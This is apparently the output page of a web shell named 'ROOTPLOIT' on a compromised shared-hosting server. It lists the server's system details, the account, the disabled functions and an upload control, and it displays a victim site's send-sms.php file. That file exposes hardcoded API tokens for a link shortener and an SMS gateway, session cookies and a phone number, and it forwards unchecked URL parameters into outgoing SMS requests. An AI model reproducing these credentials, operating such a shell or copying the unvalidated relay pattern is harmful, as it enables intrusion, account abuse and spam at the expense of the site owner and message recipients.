ROOTPLOIT
Server: LiteSpeed
System: Linux in-mum-web1878.main-hosting.eu 5.14.0-570.21.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jun 11 07:22:35 EDT 2025 x86_64
User: u435929562 (435929562)
PHP: 7.4.33
Disabled: system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
$ pwd: /home/u435929562/domains/tamira.pecockindia.in/public_html/
Upload Files
File: /home/u435929562/domains/tamira.pecockindia.in/public_html/send-sms.php
<?php
// $n = 6;
// $characters = '3qwertyu52iopasdfghjklmn6bvcxz7ZAQWSXCD0ERFVBGTYHN4MJUIKLOP189';
// $randomString = '';

// for ($i = 0; $i < $n; $i++) {
//     $index = rand(0, strlen($characters) - 1);
//     $randomString .= $characters[$index];
// }

$image = ( isset( $_GET['image'] ) ) ? "http://tamira.peacockindia.in/?image=".$_GET['image'] : "http://tamira.peacockindia.in/img/rt1-cardiovascular-surgery.jpg";
$curl = curl_init();

curl_setopt_array($curl, array(
  CURLOPT_URL => "https://api.short.io/links",
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_ENCODING => "",
  CURLOPT_MAXREDIRS => 10,
  CURLOPT_TIMEOUT => 30,
  CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
  CURLOPT_CUSTOMREQUEST => "POST",
  CURLOPT_POSTFIELDS => json_encode(array(
    'originalURL' => $image,
    'domain' => 'selfies.link'
  )),
  CURLOPT_HTTPHEADER => array(
    "authorization: 1CDbRgS3NiGKeT7kt5RbH9fWdZMQa9NO",
    "content-type: application/json"
  ),
));

$randomString = curl_exec($curl);
$err = curl_error($curl);

curl_close($curl);

// if ($err) {
//   echo "cURL Error #:" . $err;
// } else {
$randomString = json_decode($randomString);
// }

// $newLink = 'http://tamira.peacockindia.in/?q='.$randomString->shortURL;

// $content = $image."|".$newLink;

// file_put_contents( 'database/short-link.txt', $content.PHP_EOL, FILE_APPEND);

$msg = 'Thanks for sharing your feedback - here is your beautiful selfie taken at tamira, chennai - click here to view the photo '.$randomString->shortURL;

//$image = ( isset( $_GET['image'] ) ) ? "https://bootstrapmonster.com/core/share-image?image=".$_GET['image'] : "https://bootstrapmonster.com/core/share-image?image=img/rt1-cardiovascular-surgery.jpg";
$mobile = ( isset( $_GET['mobile'] ) ) ? $_GET['mobile'] : '+919428854599';
$curl = curl_init();

//'http://trans.kapsystem.com/api/v4/?api_key=Aa7daab865294fd0ba702a87969f53e64&method=sms&message='.$msg.$image.'&to='.$mobile.'&sender=BILMBE',
curl_setopt_array($curl, array(
  CURLOPT_URL => "http://trans.kapsystem.com/api/v5/index.php?method=sms&message=".$msg."&to=".$mobile."&sender=PEAIND&api_key=A5171e688fca5cb3f82d316cecaf3728d&entity_id=1601255160748540110",
  CURLOPT_RETURNTRANSFER => true,
  CURLOPT_ENCODING => '',
  CURLOPT_MAXREDIRS => 10,
  CURLOPT_TIMEOUT => 0,
  CURLOPT_FOLLOWLOCATION => true,
  CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
  CURLOPT_CUSTOMREQUEST => 'GET',
  CURLOPT_HTTPHEADER => array(
    'Cookie: AWSALB=wcqEBhMJufeqzfpN4Q92Z21NPl2jTRm1LTdGnQ8vMeSg7RRrmLORBogWk7GT+aoRm6nIx7v0AWfQkr4b0pQGPMGXk25ruKgicAWBhmyrc3aUx3WWKhLNY0GPKcEA; AWSALBCORS=wcqEBhMJufeqzfpN4Q92Z21NPl2jTRm1LTdGnQ8vMeSg7RRrmLORBogWk7GT+aoRm6nIx7v0AWfQkr4b0pQGPMGXk25ruKgicAWBhmyrc3aUx3WWKhLNY0GPKcEA'
  ),
));

$response = curl_exec($curl);
curl_close($curl);
echo $response;
@ Telegram